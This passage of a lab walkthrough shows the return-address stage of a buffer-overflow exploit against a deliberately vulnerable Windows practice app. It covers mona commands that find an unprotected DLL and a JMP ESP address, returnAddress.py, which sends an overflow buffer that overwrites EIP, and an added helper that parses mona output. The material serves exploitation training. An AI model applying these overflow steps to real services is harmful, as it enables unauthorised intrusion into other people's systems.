Finding a Return Address
This return address overwrites EIP and redirects execution to where our payload will be located. Mona.py is used for this step as well.
Listing all modules
The following command lists the modules (the executable and the DLLs it loads) that our target software uses while running. One of them has no memory protections at all, which is useful for the process.
!mona modules

Analyzing Output

Log data, item 12
Address=0BADF00D
Message= 0x62500000 | 0x62508000 | 0x00008000 | False | False | False | False | False | -1.0- [essfunc.dll] (C:\Users\admin\Desktop\vulnapps\oscp\essfunc.dll)
Searching through the output, essfunc.dll has its memory protections turned off (every flag in the row reads False), which allows this attack to go through.
Locating the JMP ESP opcode
Generating OpCode
The next step is to generate the opcode for "JMP ESP" so that we can search for it in essfunc.dll. We will use msf-nasm_shell for this.
msf-nasm_shell

Finding JMP ESP
!mona find -s "\xff\xe4" -m "essfunc.dll"

Log data, item 11
Address=625011AF
Message= 0x625011af : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\admin\Desktop\vulnapps\oscp\essfunc.dll)
0x625011AF
Hitting Offset
Now that we have the address of a JMP ESP, we can set a breakpoint on it and hit it to verify that we have full control of EIP.
Setting breakpoint

Then, hit F2 to set the breakpoint.

returnAddress.py
#!/usr/bin/python
import socket

try:
    print("\nSending evil buffer...")
    prefix = b"OVERFLOW10 "            # command the target reads before the overflowing argument
    filler = b"A" * 537                # padding up to the saved return address (offset found earlier)
    eip = b"\xaf\x11\x50\x62"          # 0x625011AF, the JMP ESP in essfunc.dll, written little-endian
    buffer = prefix + filler + eip
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(("windows.box", 1337))
    s.send(buffer)                     # bytes literals keep this working on both Python 2 and 3
    s.close()
    print("\nDone!")
except socket.error:
    print("\nCould not connect!")
Hitting breakpoint
python returnAddress.py

Our debugger shows that execution reached the JMP ESP at 0x625011AF and stopped at the breakpoint we set previously, confirming that we control EIP.
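To make the two details above concrete (what the False columns in the !mona modules row mean, and why the eip bytes in returnAddress.py are 0x625011AF written backwards), here is an added Python example that is not part of the original page or of mona. It parses a constructed module row in the format shown above, reports modules whose protection flags are all off, and packs an address in the little-endian order EIP expects; the column order (Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path) is assumed from mona's table header.

```python
import re
import struct

# Constructed sample row in the format "!mona modules" prints above (not captured from a live run).
# Column order assumed from mona's table header:
#   Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
SAMPLE_MODULE_ROW = (
    "Message= 0x62500000 | 0x62508000 | 0x00008000 | False | False | False | False | False "
    "| -1.0- [essfunc.dll] (C:\\Users\\admin\\Desktop\\vulnapps\\oscp\\essfunc.dll)"
)

FLAG_NAMES = ("rebase", "safeseh", "aslr", "nxcompat", "os_dll")


def parse_module_row(line):
    """Parse one module row into a dict; return None for lines that are not rows."""
    line = line.split("Message=", 1)[-1]      # drop the debugger log-pane prefix if present
    parts = [p.strip() for p in line.split("|")]
    if len(parts) != 9:
        return None
    try:
        base, top, size = (int(p, 16) for p in parts[:3])
    except ValueError:
        return None
    flags = {name: parts[3 + i] == "True" for i, name in enumerate(FLAG_NAMES)}
    m = re.search(r"\[(.+?)\]\s*\((.+)\)", parts[8])   # "[name] (path)" at the end of the row
    if m is None:
        return None
    return dict(base=base, top=top, size=size, name=m.group(1), path=m.group(2), **flags)


def unprotected_modules(lines):
    """Names of modules whose Rebase, SafeSEH, ASLR and NXCompat flags are all False.

    OS Dll is informational only (whether the module ships with Windows), so it is not
    part of this check.
    """
    found = []
    for line in lines:
        mod = parse_module_row(line)
        if mod and not (mod["rebase"] or mod["safeseh"] or mod["aslr"] or mod["nxcompat"]):
            found.append(mod["name"])
    return found


def pack_return_address(addr):
    """Little-endian encoding of a 32-bit address: the byte order EIP is loaded with on x86."""
    return struct.pack("<I", addr)


if __name__ == "__main__":
    mod = parse_module_row(SAMPLE_MODULE_ROW)
    print(mod["name"], hex(mod["base"]), unprotected_modules([SAMPLE_MODULE_ROW]))
    print(pack_return_address(0x625011AF))   # the same four bytes as eip in returnAddress.py
```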